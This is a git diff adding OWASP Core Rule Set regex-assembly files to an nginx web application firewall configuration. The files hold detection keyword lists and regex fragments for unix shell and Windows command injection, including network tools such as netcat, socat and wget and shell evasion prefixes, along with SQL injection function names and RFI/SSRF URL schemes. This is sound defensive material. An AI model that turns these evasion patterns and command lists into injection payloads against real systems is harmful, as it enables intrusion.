unix-shell-pl3.ra + +##! This list is managed manually and contains known user-agents causing false positives +##! in rules checking for RCE in User-Agent and Referer request header. + +##! To reduce complexity, this file simply lists all possible +##! variants of a word, so when a word would be changed from, e.g., +##! `curl@` to `curl~`, this list would not have to be updated. +##! See also unix-shell-fps-pl1.ra. + +# CPanel client (https://cpanel.net): Cpanel-HTTP-Client/1.0 +cpan +cpan@ +cpan~ +# curl (https://curl.se): curl/8.1.2 +curl +curl@ +curl~ +# Links browser (https://en.wikipedia.org/wiki/Links_(web_browser)): Links (2.3pre1; Linux 2.6.38-8-generic x86_64; 170x48) +links +links@ +links~ +# Requests (https://docs.python-requests.org/en/latest/index.html): python-requests/2.31.0 +# urllib (https://docs.python.org/3/library/urllib.html): Python-urllib/3.9 +python +python@ +python~ +# Snapchat URL Preview Service (https://developers.snap.com/robots): Snap URL Preview Service; bot; snapchat; https://developers.snap.com/robots +snap +snap@ +snap~ +# w3m browser (https://en.wikipedia.org/wiki/W3m): w3m/0.5.1 +w3m +w3m@ +w3m~ +# wget (https://www.gnu.org/software/wget/): wget +wget +wget@ +wget~ diff --git a/nginx/config/owasp-crs/regex-assembly/exclude/windows-commands-fps.ra b/nginx/config/owasp-crs/regex-assembly/exclude/windows-commands-fps.ra new file mode 100644 index 00000000..a1d77375 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/exclude/windows-commands-fps.ra @@ -0,0 +1,89 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list excludes command words that are prone to cause false +##! because they're common English words. +##! +##! This list can be generated with: +##! util/fp-finder/spell.sh -m regex-assembly/include/windows-commands.ra + +active +add +append +arp +assign +at +attributes +break +call +cd +change +choice +cipher +clean +clip +cls +color +comp +compact +convert +copy +create +date +delete +detail +echo +edit +erase +exec +exit +expand +expose +extend +extract +find +finger +fondue +format +ftp +help +inactive +label +list +md +mode +more +mount +move +msg +online +path +pause +ping +print +prompt +query +recover +rem +remove +rename +repair +replace +reset +retain +revert +select +shadow +shift +shrink +shutdown +sort +start +time +title +tree +type +ver +verifier +verify +writer diff --git a/nginx/config/owasp-crs/regex-assembly/include/allowed-charsets.ra b/nginx/config/owasp-crs/regex-assembly/include/allowed-charsets.ra new file mode 100644 index 00000000..bf902f0f --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/allowed-charsets.ra @@ -0,0 +1,9 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list is in sync with the default value of tx.allowed_request_content_type_charset. + +iso-8859-1 +iso-8859-15 +utf-8 +windows-1252 diff --git a/nginx/config/owasp-crs/regex-assembly/include/charset-specification-no-anchors.ra b/nginx/config/owasp-crs/regex-assembly/include/charset-specification-no-anchors.ra new file mode 100644 index 00000000..2cad0b73 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/charset-specification-no-anchors.ra @@ -0,0 +1,112 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! As this specification is used by several rules, we now +##! store it as an include file. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##! Helpers +##!> define non-token-without-dquote-chars (),/:;<=>?![\x5c\]{} + +##!> define non-token-chars \"{{non-token-without-dquote-chars}} + +##!> define token-chars [^{{non-token-chars}}] + +##!> define token-with-dquote-chars [^{{non-token-without-dquote-chars}}] + +##!> define type-subtype (?:\*|{{token-chars}}+) + +##! The specification does not allow `*` in place of `*/*` but +##! enough clients use `*` for it to be an issue. Thus, it is +##! explicitly allowed here. +##!> define media-type (?:(?:{{type-subtype}}/{{type-subtype}})|\*) + +##! list of allowed charsets +##!> assemble + (?:"? + ##!=> + ##!> include allowed-charsets + ##!=> + \b"?)) + ##!=< allowed-charsets +##!< + + +##! Main assembly +##!> assemble + (?:{{media-type}}) + ##!=> + (?:\s*;\s* + ##!=> + (?:(?:charset\s*=\s* + ##!=> + ##!=> allowed-charsets + + ##! If the first part wasn't a "charset", then + ##! anything is allowed here that is not "charset". + ##! Note that this doesn't follow the RFC strictly. + |(?: + ##!=> + ##! Do not match space, otherwise the following would be possible: + ##! "text/html; charset=invalid" + ##! `charset` would be matched by `{{token-chars}}` + [^c\s{{non-token-chars}}]{{token-chars}}* + c[^h{{non-token-chars}}]{{token-chars}}* + ch[^a{{non-token-chars}}]{{token-chars}}* + cha[^r{{non-token-chars}}]{{token-chars}}* + char[^s{{non-token-chars}}]{{token-chars}}* + chars[^e{{non-token-chars}}]{{token-chars}}* + charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> + )\s*=\s*{{token-with-dquote-chars}}+) + ##!=> + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. + ;? + ##!=> + )* + ##!=> + + ##! Multiple "media-range" expressions can be + ##! specified, comma separated. + (?:\s*,\s* + ##!=> + (?:{{media-type}}) + ##!=> + (?:\s*;\s* + ##!=> + (?:(?:charset\s*=\s* + ##!=> + ##!=> allowed-charsets + |(?: + ##!=> + ##! Do not match space, otherwise the following would be possible: + ##! "text/html; charset=invalid" + ##! `charset` would be matched by `{{token-chars}}` + [^c\s{{non-token-chars}}]{{token-chars}}* + c[^h{{non-token-chars}}]{{token-chars}}* + ch[^a{{non-token-chars}}]{{token-chars}}* + cha[^r{{non-token-chars}}]{{token-chars}}* + char[^s{{non-token-chars}}]{{token-chars}}* + chars[^e{{non-token-chars}}]{{token-chars}}* + charse[^t{{non-token-chars}}]{{token-chars}}* + ##!=> + )\s*=\s*{{token-with-dquote-chars}}+) + ##!=> + ##! Clients like to violate the RFC, be lenient with + ##! terminating semi-colons. + ;? + ##!=> + )*)* + ##!=> +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/include/charset-specification.ra b/nginx/config/owasp-crs/regex-assembly/include/charset-specification.ra new file mode 100644 index 00000000..24f2127d --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/charset-specification.ra @@ -0,0 +1,21 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! The expression generated from this file matches a full HTTP +##! `Accept` header by following the specification as far as +##! necessary, while restricting the `charset` parameter +##! to a list of explicitly allowed values. +##! Where possible, the expression matches tokens "loosely", +##! to reduce complexity and the risk of false positives. + +##! As this specification is used by several rules, we now +##! store it as an include file. + +##! Specifications: +##! https://httpwg.org/specs/rfc7231.html#request.conneg +##! https://httpwg.org/specs/rfc7230.html + +##!^ ^ +##!$ $ + +##!> include charset-specification-no-anchors diff --git a/nginx/config/owasp-crs/regex-assembly/include/js-truthy-values.ra b/nginx/config/owasp-crs/regex-assembly/include/js-truthy-values.ra new file mode 100644 index 00000000..5e229bb9 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/js-truthy-values.ra @@ -0,0 +1,49 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Falsy and negations +##!> assemble + !+ + ##!=> + false + null + undefined + NaN + [-+]?0 + "{2} + '{2} + `{2} +##!< + +##! Truthy and double negations (word boundary) +##!> assemble + (?:!!)* + ##!=> + true + [-+]?Infinity + [-+]?[1-9]\d* + new [a-zA-Z]\w* + this + window + String + Boolean + Object + Array + Function + ##!=> + \b + ##!=> +##!< + + +##! Truthy and double negations (no word boundary: anything that ends +##! with a special character) +##!> assemble + (?:!!)* + ##!=> + \{.*\} + \[.*\] + "[^"]+" + '[^']+' + `[^`]+` +##!< diff --git a/nginx/config/owasp-crs/regex-assembly/include/sql-injection-function-names.ra b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-function-names.ra new file mode 100644 index 00000000..91b47bf8 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-function-names.ra @@ -0,0 +1,285 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##!^ \b +##!$ \W*\( + +adddate +addtime +aes_decrypt +aes_encrypt +ascii +asciistr +asin +atan +atan2 +benchmark +bin_to_num +bit_and +bit_count +bit_length +bit_or +bit_xor +char_length +character_length +ciel +cieling +coalesce +coercibility +collation +compress +concat +concat_ws +connection_id +conv +convert +convert_tz +cos +cot +cr32 +curdate +current_date +current_setting +current_time +current_timestamp +current_user +curtime +database +database_to_xml +date_add +date_format +date_sub +datediff +dayname +dayofmonth +dayofweek +dayofyear +dcount +decode +degrees +des_decrypt +des_encrypt +dump +elt +encode +encrypt +endswith +ends_with +exp +export_set +extract +extractvalue +field_in_set +find_in_set +found_rows +from_base64 +from_days +from_unixtime +geometrycollection +get_format +get_lock +getpgusername +greatest +group_concat +gtid_subset +hex +hextoraw +ifnull +inet6_aton +inet6_ntoa +inet_aton +inet_ntoa +insert +instr +interval +is_free_lock +is_ipv4 +is_ipv4_compat +is_ipv4_mapped +is_ipv6 +is_not +is_not_null +is_null +is_superuser +is_used_lock +isnull +json +json_agg +json_array +json_array_elements +json_array_elements_text +json_array_length +json_build_array +json_build_object +json_each +json_each_text +json_extract_path +json_extract_path_text +json_object +json_object_agg +json_object_keys +json_populate_record +json_populate_recordset +json_strip_nulls +json_to_record +json_to_recordset +json_typeof +jsonb +jsonb_array +jsonb_array_elements +jsonb_array_elements_text +jsonb_array_length +jsonb_build_array +jsonb_build_object +jsonb_object +jsonb_each +jsonb_each_text +jsonb_extract_path +jsonb_extract_path_text +jsonb_insert +jsonb_object +jsonb_object_agg +jsonb_object_keys +jsonb_path_exists +jsonb_path_exists_tz +jsonb_path_match +jsonb_path_match_tz +jsonb_path_query +jsonb_path_query_array +jsonb_path_query_array_tz +jsonb_path_query_first +jsonb_path_query_first_tz +jsonb_path_query_tz +jsonb_populate_record +jsonb_populate_recordset +jsonb_pretty +jsonb_set +jsonb_set_lax +jsonb_strip_nulls +jsonb_to_record +jsonb_to_recordset +jsonb_typeof +jsonpath +last_day +last_inser_id +lcase +least +left +likelihood +likely +linestring +lo_from_bytea +lo_put +load_file +localtimestamp +locate +log10 +log2 +lower +lpad +ltrim +make_set +makedate +master_pos_wait +md5 +microsecond +mid +monthname +multilinestring +multipoint +multipolygon +name_const +not_in +nullif +oct +octet_length +old_password +ord +period_add +period_diff +pg_client_encoding +pg_database +pg_largeobject +pg_ls_dir +pg_read_file +pg_sleep +pg_user +polygon +position +pow +procedure_analyse +quarter +query_to_xml +quote +radians +rand +rawtohex +release_lock +row_count +row_to_json +rpad +rtrim +schema +sec_to_time +session_user +sha +sha1 +sha2 +sin +soundex +space +sqlite_compileoption_get +sqlite_compileoption_used +sqlite_source_id +sqrt +startswith +starts_with +std +stddev_pop +stddev_samp +str_to_date +strcmp +subdate +substr +substring +substring_index +subtime +sysdate +system_user +time_format +time_to_sec +timediff +timestamp +timestampadd +timestampdiff +to_base64 +to_json +to_jsonb +tochar +todays +tonchar +toseconds +trim +truncate +ucase +uncompress +uncompressed_length +unhex +unistr +unix_timestamp +unlikely +updatexml +use_json_null +utc_date +utc_time +utc_timestamp +uuid +uuid_short +var_pop +var_samp +variance +weekday +weekofyear +weight_string +xmltype +yearweek diff --git a/nginx/config/owasp-crs/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra new file mode 100644 index 00000000..a58f2c42 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/sql-injection-mysql-postgresql-procedures-functions.ra @@ -0,0 +1,23 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +create\s+function\s*?\w+\s*?\(\s*?\)\s*?- +create\s+procedure\s*?\w+\s*?\(\s*?\)\s*?- +declare[^\w]+[@#]\s*?\w+ +div\s*?\([+-]*[\d.\s]+,[+-]*[\d.\s]+\) +exec\s*?\(\s*?@ +lo_import\s*?\( +lo_get\s*?\( +procedure\s+analyse\s*?\( +;\s*?declare\s+[\w-]+ +;\s*?open\s+[\w-]+ +::bigint +::bool +::double\s+precision +::int +::integer +::numeric +::oid +::real +::text +::smallint diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-4andup.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-4andup.ra new file mode 100644 index 00000000..8edb5a67 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-4andup.ra @@ -0,0 +1,574 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list was generated from the original lists with the following command: +##! awk '/^([a-z0-9_-]+)/ { x = $0; gsub(/[@~]/, "", x); if (length(x) > 3) print }' 93210{0,5}.data + +##! Note that the suffixes must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-4andup.ra)" +##! source="$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) > 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq)" +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword//++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! # handle "clang++" +##! sword="${sword/%++/\+\+}" +##! # handle "." in commands +##! sword="${sword//./\.}" +##! found=0 +##! while read -r oword; do +##! # strip suffixes from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="${result}" +##! english="$(util/fp-finder/spell.sh -m -e - <<<"${result}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-4andup.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-4andup.ra <> regex-assembly/include/unix-shell-4andup.ra + +HEAD@ +POST@ +addgroup +adduser +agetty +alias@ +alpine@ +ansible-playbook +apt-get +aptitude@ +arch@ +aria2c +ascii-xfr +ascii85 +aspell +atobm +axel +base32 +base64 +basename@ +basenc +bash@ +batch@ +blkid +bpftrace +breaksw +bridge@ +bsdcat +bsdiff +bsdtar +builtin +bundler@ +bunzip2 +busctl +busybox +byebug +byobu +bzcat +bzcmp +bzdiff +bzegrep +bzexe +bzfgrep +bzgrep +bzip2 +bzip2recover +bzless +bzmore +cancel@ +capsh@ +certbot +chattr +chdir@ +check_by_ssh +check_cups +check_log +check_memory +check_raid +check_ssl_cert +check_statusfile +chflags +chgpasswd +chgrp +chmod +choom +chown +chpass +chroot@ +chsh +clang@ +clang\+\+ +cobc +column@ +comm@ +command@ +composer@ +compress@ +coproc +cowsay +cowthink +cpan +cpio +cpulimit +crash@ +cron +crontab +csplit +csvtool +cupsfilter +curl@ +dash@ +date@ +dhclient +dialog@ +diff@ +dmesg +dmidecode +dmsetup +doas +docker@ +done@ +dosbox +dpkg +dvips +e2fsck +easy_install +echo@ +efax +egrep +emacs +endif +endsw +env-update +esac +eval +exec@ +exiftool +expand@ +expect@ +export@ +expr +facter +fetch@ +fgrep +file@ +filetest +find@ +finger@ +fish@ +flock@ +fold@ +foreach +fping +ftpstats +ftpwho +function@ +gawk@ +gcore +genie@ +genisoimage +getfacl@ +ghci +gimp@ +ginsh +grep@ +group@ +groupmod +gtester +gunzip +gzcat +gzexe +gzip +hash@ +head@ +hexdump +highlight@ +history@ +hostid +hostname +hping3 +htdigest +htop +htpasswd +iconv +ifconfig +iftop +install@ +ionice +ip6tables +ipconfig +iptables +ispell +java@ +jexec +jobs@ +join@ +journalctl +jrunscript +kill@ +killall +knife@ +ksshell +last@ +lastcomm +lastlog +lastlogin +latex@ +ldconfig +less@ +lessecho +lessfile +lesspipe +lftp +lftpget +links@ +local@ +locate@ +loginctl +logname +logsave +look@ +losetup +ls-F +lsb_release +lscpu +lshw +lsmod +lsof +lspci +lsusb +ltrace +lualatex +luatex +lwp-download +lwp-dump +lwp-mirror +lwp-request +lynx@ +lz4c +lz4cat +lzcat +lzcmp +lzdiff +lzegrep +lzfgrep +lzgrep +lzless +lzma +lzmadec +lzmainfo +lzmore +mail@ +mailq +mailx@ +make@ +master\.passwd +mawk +mkdir@ +mkfifo +mknod +mktemp +mlocate +more@ +mosquitto +mount@ +msgattrib +msgcat +msgconv +msgfilter +msgmerge +msguniq +mutt@ +mysql +mysqladmin +mysqldump +mysqldumpslow +mysqlhotcopy +mysqlshow +nano@ +nasm +nawk +nc\.openbsd +nc\.traditional +ncat +neofetch +netcat +netkit-ftp +netplan +netstat +nice@ +nmap +node@ +nohup +nping +nroff +nsenter +nslookup +nstat +null@ +octave@ +onintr +openssl +openvpn +openvt +opkg +pacman@ +parted@ +passwd +paste@ +patch@ +pdflatex +pdftex +pdksh +perf +perl +perl5 +perlsh +perms@ +pftp +pgrep +php-cgi +php5 +php7 +pico@ +pidstat +pigz +ping@ +pkexec +pkg_info +pkginfo +pkill +popd +printenv +printf@ +psed +psftp +psql +ptar +ptardiff +ptargrep +puppet@ +pushd +pwd\.db +python2 +python3 +python~ +rake@ +raku +rbash +readelf +realpath +redcarpet@ +rename@ +repeat@ +replace@ +restic +rlogin +rlwrap +rmdir@ +rmuser +rnano +route@ +rpmdb +rpmquery +rpmverify +rsync +ruby~ +run-mailcap +run-parts +rview +rvim +sash@ +sched +screen@ +script@ +sdiff +self@ +sendmail +service@ +setarch +setenv +setfacl@ +setsid +sftp +sh\.distrib +shadow@ +shells@ +shuf +shutdown@ +sleep@ +slsh +smbclient +snap@ +socat +soelim +sort@ +source@ +split@ +spwd\.db +sqlite3 +ssh-keygen +ssh-keyscan +sshpass +start-stop-daemon +stdbuf +stderr +stdin +stdout +strace +strings@ +sudo +sysctl +systemctl +systemd-resolve +tail@ +tailf +task@ +taskset +tclsh +tcpdump +tcping +tcptraceroute +tcsh +telnet +tftp +time@ +timedatectl +timeout@ +tmux +touch@ +traceroute +traceroute6 +troff +tshark +ulimit@ +uname +uncompress@ +unexpand +uniq +unlink@ +unlz4 +unlzma +unpigz +unrar +unset@ +unshare@ +unxz +unzip@ +unzstd +up2date@ +update-alternatives +useradd +userdel +usermod +uudecode +uuencode +valgrind +view@ +vigr +vimdiff +vipw +virsh +volatility@ +wall@ +watch@ +wget +whiptail@ +whoami +whois +wireshark +wish@ +xargs +xelatex +xetex +xmodmap +xmore +xpad +xterm +xzcat +xzcmp +xzdec +xzdiff +xzegrep +xzfgrep +xzgrep +xzless +xzmore +yarn@ +yelp@ +zathura +zcat +zcmp +zdiff +zegrep +zero@ +zfgrep +zgrep +zipcloak +zipcmp +zipdetails +zipgrep +zipinfo +zipmerge +zipnote +zipsplit +ziptool +zless +zmore +zrun +zsoelim +zstd +zstdcat +zstdgrep +zstdless +zstdmt +zypper diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra new file mode 100644 index 00000000..67e2f493 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix-start-of-string.ra @@ -0,0 +1,56 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This assembly constructs the prefix used by 932250 and 932260 + +##! ifconfig +^ +##! ={ifconfig} += +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! commands prefix +##!> assemble + ##! time ifconfig + ##!> cmdline unix + time + ##!< + ##! { ifconfig } + \{ + ##! ( ifconfig ) + \s*\(\s* + ##! VARNAME=xyz ifconfig + \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ + ##! ! ifconfig + !\s* + ##! $ifconfig + \$ +##!< +##!=> + +* +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! quoting prefix +##!> assemble + ##! 'ifconfig' + ' + ##! "ifconfig" + \" +##!< +##!=> + +* +##!=> + +##! paths prefix (+ evasion prevention suffix [\x5c'\"]*) +(?:[\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/)?[\x5c'\"]* +##!=> diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix.ra new file mode 100644 index 00000000..3893034c --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-evasion-prefix.ra @@ -0,0 +1,85 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This assembly file generates a prefix match for unix shell RCE +##! evasions. Command words, in this case, must folow the prefix. +##! Separate rules target commands that do not follow this prefix, +##! as the chance of false positives is higher without a prefix match. + +##! time ifconfig +##!> cmdline unix + time +##!< +##! ;ifconfig +; +##! {ifconfig} +\{ +##! |ifconfig +\| +##! ||ifconfig +\|\| +##! &ifconfig +& +##! & &ifconfig +&& +##! ;\nifconfig +\n +##! ;\rifconfig +\r +##! $(ifconfig) +\$\( +##! $((ifconfig)) +\$\(\( +##! `ifconfig` +` +##! ${ifconfig} +\${ +##! <( ifconfig ) +<\( +##! >( ifconfig ) +>\( +##! a() ( ifconfig; ); a +\(\s*\) +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! commands prefix +##!> assemble + ##! { ifconfig } + \{ + ##! ( ifconfig ) + \s*\(\s* + ##! VARNAME=xyz ifconfig + \w+=(?:[^\s]*|\$.*|\$.*|<.*|>.*|\'.*\'|\".*\")\s+ + ##! ! ifconfig + !\s* + ##! $ifconfig + \$ +##!< +##!=> + +* +##!=> + +##! match possible white space between prefix expressions +\s* +##!=> + +##! quoting prefix +##!> assemble + ##! 'ifconfig' + ' + ##! "ifconfig" + \" +##!< +##!=> + +* +##!=> + +##! paths prefix (+ evasion prevention suffix [\x5c'\"]*) +(?:[\?\*\[\]\(\)\-\|+\w'\"\./\x5c]+/)?[\x5c'\"]* +##!=> diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-pl3.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-pl3.ra new file mode 100644 index 00000000..c17b7515 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-pl3.ra @@ -0,0 +1,27 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This list contains terms that are only searched for at PL 3. +##! Note that the equivalent could be achieved by using +##! `include` processors with both <= 3 and > 3 but that would +##! make the rule almost identical to its PL 1 counterparts, +##! artificially doubling the critiality of hits and adding +##! unnecessary overhead. + +##! Note that this list is arbitrary. We do not have criteria +##! for inclusion in this list apart from false positive +##! reports. + +##! This list must be in sync with: +##! - unix-shell-upto3.ra +##! - unix-shell-4andup.ra +##! - unix-shell-pl3.ra + +aptitude@ +dnf +pacman@ +ps +up2date@ +vi@ +who +w@ diff --git a/nginx/config/owasp-crs/regex-assembly/include/unix-shell-upto3.ra b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-upto3.ra new file mode 100644 index 00000000..f508587b --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/unix-shell-upto3.ra @@ -0,0 +1,198 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! Note that the suffixes @ / ~ must be added manually to new entries. +##! To regenerate this list from unix-shell.data, run the following: +##! NL=$'\n' +##! # select words of length <= 3 +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! source=$(awk '/^[^#$]/ {split($0,x,"/"); y=x[length(x)]} length(y) <= 3 {print y}' \ +##! rules/unix-shell.data | \ +##! sort | uniq) +##! result="" +##! # retain all unmodified entries in this list and skip removed ones; ignore the manually added suffixes +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! while read -r sword; do +##! if [ "${oword_raw}" = "${sword}" ]; then +##! result="${result}${oword}${NL}" +##! break +##! fi +##! done <<<"${source}" +##! done <<<"${original}" + +##! # add new entries to this list +##! while read -r sword; do +##! found=0 +##! while read -r oword; do +##! # strip @ and ~ from end of words +##! oword_raw="${oword/%@/}" +##! oword_raw="${oword_raw/%\~/}" +##! if [ "${oword_raw}" = "${sword}" ]; then +##! found=1 +##! break +##! fi +##! done <<<"${original}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${sword}${NL}" +##! fi +##! done <<<"${source}" + +##! # check entries for English words and suffix those +##! original="$(grep -vE '^[#$]' regex-assembly/include/unix-shell-upto3.ra)" +##! english="$(util/fp-finder/spell.sh -m -e regex-assembly/include/unix-shell-upto3.ra)" +##! # do not suffix the following words: +##! english="$(grep -vE 'ip|id|top|set' <<< "${english}")" +##! result="" +##! while read -r oword; do +##! found=0 +##! while read -r eword; do +##! if [ "${oword}" = "${eword}" ] && [ -n "${oword}" ]; then +##! result="${result}${oword}@${NL}" +##! found=1 +##! break +##! fi +##! done <<<"${english}" +##! if [ ${found} -eq 0 ]; then +##! result="${result}${oword}${NL}" +##! fi +##! done <<<"${original}" + +##! body_start=$(grep -n -E -m 1 '^[^#$]' regex-assembly/include/unix-shell-upto3.ra | cut -d: -f1) +##! ed -s regex-assembly/include/unix-shell-upto3.ra <> regex-assembly/include/unix-shell-upto3.ra + +7z +7za +7zr +7zx +GET@ +ab@ +apt@ +ar@ +arj +arp@ +as@ +ash@ +at@ +awk@ +aws@ +bzz@ +c89 +c99 +cat@ +cc@ +cmp +cp@ +csh +cut@ +dd@ +df +dig@ +dir@ +dnf +du@ +eb@ +ed@ +env +eqn +es@ +esh +ex@ +fc@ +fd +fg +fi@ +fmt +ftp@ +gcc~ +gdb +gem@ +ghc +git@ +go@ +gpg +grc +hd@ +hup@ +id +ip +irb +jjs +jq +ksh +ld@ +ldd@ +ln@ +lp@ +ls +lua@ +lz4 +lz@ +man@ +mtr +mv@ +nc@ +net@ +nl@ +nm@ +npm@ +od@ +pax@ +pdb +pf@ +pg +php@ +pic@ +pip~ +pkg +pr@ +pry@ +ps@ +ptx +pwd +pxz +rar@ +rc +rcp@ +red@ +rev@ +rm@ +rpm@ +scp +sed@ +set +sg@ +sh@ +ss@ +ssh@ +su@ +svn +tac +tar@ +tbl +tcp@ +tee@ +tex@ +tic@ +top +udp +ul@ +vi@ +vim@ +w3m +w@ +wc +who@ +xxd +xz@ +yes@ +yum +zip@ +zsh diff --git a/nginx/config/owasp-crs/regex-assembly/include/url-schemes.ra b/nginx/config/owasp-crs/regex-assembly/include/url-schemes.ra new file mode 100644 index 00000000..136606e2 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/url-schemes.ra @@ -0,0 +1,120 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This is a list of schemes that can be used for RFI/SSRF (from https://en.wikipedia.org/wiki/List_of_URI_schemes): + +acap +afp +afs +attachment +beshare +bitcoin +blob +callto +cap +cid +cvs +dav +data +dict +dns +dntp +ed2k +expect +fd +feed +file +finger +fish +ftp +ftps +git +go +gopher +h323 +http +https +iax +icap +imap +imaps +ipp +ipps +irc +irc6 +ircs +jabber +jar +ldap +ldapi +ldaps +local_file +mailto +maven +mms +mumble +netdoc +news +nfs +nntp +nntps +ogg +paparazzi +phar +pop2 +pop3 +pop3s +pres +proxy +psyc +rmi +rsync +rtm +rtmfp +rtmp +s3 +sftp +sip +sips +smb +smtp +smtps +sms +snews +snmp +ssh +ssh2 +svn +svn\+ssh +teamspeak +telnet +tftp +turn +turns +udp +unreal +ut2004 +ventrilo +view-source +vnc +webcal +ws +wss +xmpp +xri + +##! Adding also the list of PHP (sub)schemes that can be used for RFI/SSRF (from https://www.php.net/manual/en/wrappers.php): + +ssh2.shell +ssh2.exec +ssh2.tunnel +ssh2.sftp +ssh2.scp +compress.zlib +compress.bzip2 +zip +glob +rar +ogg +expect +php diff --git a/nginx/config/owasp-crs/regex-assembly/include/windows-commands-prefix.ra b/nginx/config/owasp-crs/regex-assembly/include/windows-commands-prefix.ra new file mode 100644 index 00000000..bbb14520 --- /dev/null +++ b/nginx/config/owasp-crs/regex-assembly/include/windows-commands-prefix.ra @@ -0,0 +1,72 @@ +##! Please refer to the documentation at +##! https://coreruleset.org/docs/development/regex_assembly/. + +##! This assembly file generates a prefix match for windows commands. +##! Command words, in this case, must follow the prefix. +##! Separate rules target commands that do not follow this prefix, +##! as the chance of false positives is higher without a prefix match. + +##! Note: the quoting prefixes are part of the command prefixes, except for ^ +##! which, for unknown reasons, is not part of the expression + +##! time cmd +##!> cmdline windows + time +##!< +##! ;cmd +; +##! {cmd +\{ +##! |cmd +\| +##! ||cmd +\|\| +##! &cmd +& +##! &&cmd +&& +##! \ncmd +\n +##! \rcmd +\r +##! `cmd +` +##!=> + 